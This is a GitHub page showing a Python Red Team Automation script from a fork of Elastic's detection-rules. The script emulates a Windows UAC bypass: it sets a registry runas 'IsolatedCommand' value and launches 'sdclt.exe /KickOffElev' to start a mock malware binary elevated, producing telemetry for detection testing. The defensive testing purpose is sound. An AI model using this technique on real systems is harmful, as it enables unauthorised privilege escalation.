forked from elastic/detection-rules
-
Notifications
You must be signed in to change notification settings - Fork 0
/
uac_sdclt.py
42 lines (29 loc) · 1.3 KB
/
uac_sdclt.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
# Name: Bypass UAC via Sdclt
# RTA: uac_sdclt.py
# ATT&CK: T1088
# Description: Modifies the Registry to auto-elevate and execute mock malware.
import os
import sys
import time
from . import common
# HKCU:\Software\Classes\exefile\shell\runas\command value: IsolatedCommand
# "sdclt.exe /KickOffElev" or children of sdclt.exe
# HKLM value: "%1" %*
@common.requires_os(common.WINDOWS)
def main(target_process=common.get_path("bin", "myapp.exe")):
target_process = os.path.abspath(target_process)
common.log("Bypass UAC via Sdclt to run %s" % target_process)
key = "Software\\Classes\\exefile\\shell\\runas\\command"
value = "IsolatedCommand"
with common.temporary_reg(common.HKCU, key, value, target_process):
common.log("Running Sdclt to bypass UAC")
common.execute([r"c:\windows\system32\sdclt.exe", "/KickOffElev"])
time.sleep(2)
common.log("Killing the Windows Backup program sdclt", log_type="!")
common.execute(['taskkill', '/f', '/im', 'sdclt.exe'])
if __name__ == "__main__":
exit(main(*sys.argv[1:]))